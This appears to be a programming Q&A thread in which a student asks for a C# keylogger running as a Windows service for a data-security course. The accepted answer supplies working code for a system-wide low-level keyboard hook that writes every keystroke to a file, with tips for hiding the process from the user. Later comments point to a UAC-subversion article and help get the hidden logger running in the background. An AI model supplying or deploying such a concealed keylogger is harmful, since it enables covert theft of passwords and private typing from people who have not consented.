# Windows Service Keylogger

Tags: c#, windows, service, keylogger

I have an University project which requires to create some sort of keylogger with c#, I mean to get all the keyboard inputs from the user and put them in a file, the input which in this case is a text needs also to be encrypted. This application need to be a windows service, I'm new to windows services but I have successfully managed to create a windows service using Visual Studio 2015.The problem now is at the keylogger, I've searched for quite a long now but most keyloggers I've seen have been developed using windows forms and not windows services. I have this function:

```
protected override void OnStart(string[] args)
{
  System.IO.File.Create(AppDomain.CurrentDomain.BaseDirectory + "OnStart.txt");
}
```

What I have done here is that when the service starts it creates a new .txt file called Output at the directory of the application where all the inputs of the user are going to be saved or recorded.

Could someone help me or redirect me somewhere so I could create a simple keylogger using a windows service? I've managed to create a keylogger with windows forms using a timer which would save the data every second but using a windows service seems to be a bit hard for me.

Comment: `I've managed to create a keylogger with windows forms using a timer which would save the data every second but using a windows service seems to be a bit hard for me` Where exactly are you failing to achieve this? Also can you share the method you are using?

Comment: The method I used at the application with windows forms used a textbox to get the content and then transfer that content to the text file, since I do not have textboxes here I do not know exactly how to solve this, I mean to get the keyboard inputs from everywhere the user types, e.g notepad, browser etc.

Answer (score 10, accepted):

From [this question](https://stackoverflow.com/questions/16665852/keyboard-hook-as-a-windows-service) it looks like it may not be possible to do from a service, for security reasons.

However, you could create a program which uses keybaord hooks and does not display any console or windows, meaning it will be hidden from the user (just like a service would).

To do this, first declare some fields:

```
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;

private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
```

Then import these native methods:

```
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, 
    LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
    IntPtr wParam, IntPtr lParam);

[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
```

Create these methods, where `HookCallback` will handle any detected key presses (so write to file here uder the comment)

```
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
    if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
    {
        int vkCode = Marshal.ReadInt32(lParam);
        var keyName = Enum.GetName(typeof(Keys), vkCode);
        var path = @"C:\test\logfile.txt";

        // Handle the key press here
        var text = ((Keys)vkCode).ToString();
        File.AppendAllText(path, text);
    }

    return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
```

`SetHook` basically subscribes to the keyboard hook for us:

```
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
    using (Process curProcess = Process.GetCurrentProcess())
    using (ProcessModule curModule = curProcess.MainModule)
    {
        return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
            GetModuleHandle(curModule.ModuleName), 0);
    }
}
```

Finally, add these lines to your `Main` method:

```
_hookID = SetHook(_proc);
Application.Run();
UnhookWindowsHookEx(_hookID);
```

Now to make the program invisible, simply change the `Output Type` property to a `Windows Application` instead of a `Console Application`.

I hope this is helpul to you

Comment: Thanks for you help and your time to write the comment. The course I'm on is about the Data Security and the project requires that the application to be executed as a Windows Service. It is strange since we learn how to secure the data but in the other hand we are required to do things which for security reasons cannot be implemented.The code you wrote is gonna be useful to me but I think I'm going to search a bit more to find a way for the service to be able to interact with the desktop or something similar if there is a way to do so.Thanks again!

Comment: Okay, so now I followed this [link](https://www.codeproject.com/Articles/35773/Subverting-Vista-UAC-in-Both-and-bit-Archite) to be able to open applications using Windows Services, hopefully I managed to open an application(Visual Studio project) by starting my service. I created a windows forms application and used your code to make the keylogger there, when the service starts it creates a .txt file at  its install directory then at the windows application I changed the var path to the path of that .txt file.

Comment: The main  function at the window form application looks like this: static `void Main()  
        {
            //Application.EnableVisualStyles();  
            //Application.SetCompatibleTextRenderingDefault(false);     
            //Application.Run(new Form1());  
            _hookID = SetHook(_proc);   
            Application.Run(new Form1());  
            UnhookWindowsHookEx(_hookID);  
        }  ` The code which is commented was generated by the Visual Studio and I commented it so I could use @Bassie code.

Comment: @BardhMehmeti Is that working for you then? I would recommend creating a Console Application instead of Windows Forms for this

Comment: The application runs on the background as a windows process and is not shown in the desktop or anywhere else, but it is not saving my inputs at the .txt file I thought that maybe the main function could have been different, as you can see I didn't use `Application.Run()`, instead I used `Application.Run(new Form1())` which I do not know exactly if they're the same thing in my case of have differences

Comment: When I created a console application it didn't let me use `using System.Windows.Forms;`, I do not know why, even though I changed the output to Windows Application.I needed to use `System.Windows.Forms` in order to be able to use `typeof(Keys)`and similar code which used the keyword `Keys`.It says that the type or namespace could not be found.

Comment: @BardhMehmeti To overcome the issue with missing `System.Windows.Forms` all you need to do is go `Project` -> `Add Reference...` -> find `System.Windows.Forms` on the list and activate the checkbox. Then add a `using System.Windows.Forms` in the file where you want to use it. (this is all assuming you are using Visual Studio)

Comment: I followed your advice and created a console application, the situation is as follows: I start the service, the .txt file is created, I cannot open the file because is being used by the service, at the same time the process called KeyLogger.exe is run which should do the keylogger work, after I stop the service the process is still running and the keylogger works. I mean the inputs from the keyboard are saved in the .txt file. Is there a way to be able to use the .txt file while the service is running? Thanks for your help!

Comment: @BardhMehmeti Can you share the code in the service which operates on the txt file? You may need to release it somehow. Alternatively, just create the txt file in the exe rather than the service

Comment: Okay, so I created the file in the window application this way:`using (StreamWriter sw = new StreamWriter(filePath, true))
  {
  _hookID = SetHook(_proc); 
  }
  Application.Run();
  UnhookWindowsHookEx(_hookID);`. So I can open the .txt file while both the service and the process are running, right now I could say that the question is solved but there is a slight problem. The inputs need to be encrypted with AES, all I need to know is in what variable or part of code are the inputs so I can get them and then encrypt them? If you think I should discover this by myself you can ignore this.

Comment: @BardhMehmeti You can get the input (keystroke values) in the `HookCallback` method. As you can see under the comment, the value written to the txt file is saved as `text`. If that is not what you're after, maybe try debugging that method to see which paramater you are interested in encrypting.